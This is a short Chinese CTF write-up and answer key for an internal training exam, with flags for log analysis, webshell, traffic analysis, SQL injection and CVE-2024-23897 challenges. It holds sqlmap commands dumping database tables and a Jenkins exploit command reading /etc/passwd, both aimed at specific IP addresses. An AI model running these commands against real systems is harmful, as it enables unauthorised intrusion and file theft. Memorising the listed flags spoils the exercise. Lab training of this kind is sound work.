内部培训测试 - 长亭科技平台

1、 日志分析2024 （100 分）简单安全杂项

0,1),1,1))=102 这些后面的数字。

flag{mayiyahei1965ae7569}

2、 事件协同与响应-考试 （200 分）中等安全杂项

蚁剑马 Key: d76R3478
flag{578530@chaitin}

3、 Misc-流量分析 （100 分）简单安全杂项\

过滤排序后为

/agent/metrics/putLines	
/upload/0	789c333430020001280094
/upload/1	789c3334b00000012e009a
/upload/2	789cb334070000ab0071
/upload/3	789c333430060001290095
/upload/4	789c3334320600012d0097
/upload/5	789c333430000001260092
/upload/6	789c33350400009d0067
/upload/7	789c33350200009e0068
/upload/8	789c33b1040000a3006e
/upload/9	789c333430020001280094
/upload/10	789c33350200009e0068
/upload/11	789c33350000009c0066
/upload/12	789c3335050000a1006b
/upload/13	789c333430040001270093
/upload/14	789c3335050000a1006b
/upload/15	789c3335070000a3006d
/upload/16	789c3335050000a1006b
/upload/17	789c33350200009e0068
/upload/18	789cb3b4000000ac0072
/upload/19	789c33350400009d0067
/upload/20	789c33350400009d0067
/upload/21	789cb334070000ab0071
/upload/22	789c3335030000a2006c
/upload/23	789c333430020001280094
/upload/24	789c333430000001260092
/upload/25	789cb3b4000000ac0072
/upload/26	789c3335030000a2006c
/upload/27	789c333430000001260092
/upload/28	789c33350400009d0067
/upload/29	789c3335030000a2006c
/upload/30	789c3335010000a0006a
/upload/31	789c333430000001260092
/upload/32	789cb334070000ab0071
/upload/33	789c3335030000a2006c
/upload/34	789c3335050000a1006b
/upload/35	789c3335030000a2006c
/upload/36	789c333430020001280094
/upload/37	789c3334320500012f0099

zlib解码。得到flag
flag{d341f427e7974b33a8fdb8d386da878f}

4、 Web-SQL注入 （200 分）中等web安全

sqlmap -u http://101.200.43.249/sql2.php/?id= --current-user
sqlmap -u http://101.200.43.249/sql2.php/?id= -D pwnhubsql2 --tables
sqlmap -u http://101.200.43.249/sql2.php/?id= -D pwnhubsql2 -T flaghahaha --columns
flag{43913e17463a90ecbebd2bdfa0ab362b}

5、 CVE-2024-23897 （200 分）中等web安全

CVE-2024-23897 -url http://59.110.164.194:8080/ -c reload-job -a /etc/passwd
flag{afc832a6-b6be-7732-fb89-deefec2a7def}
usage: CVE-2024-23897.py -u http://59.110.164.194:8080 -f /flag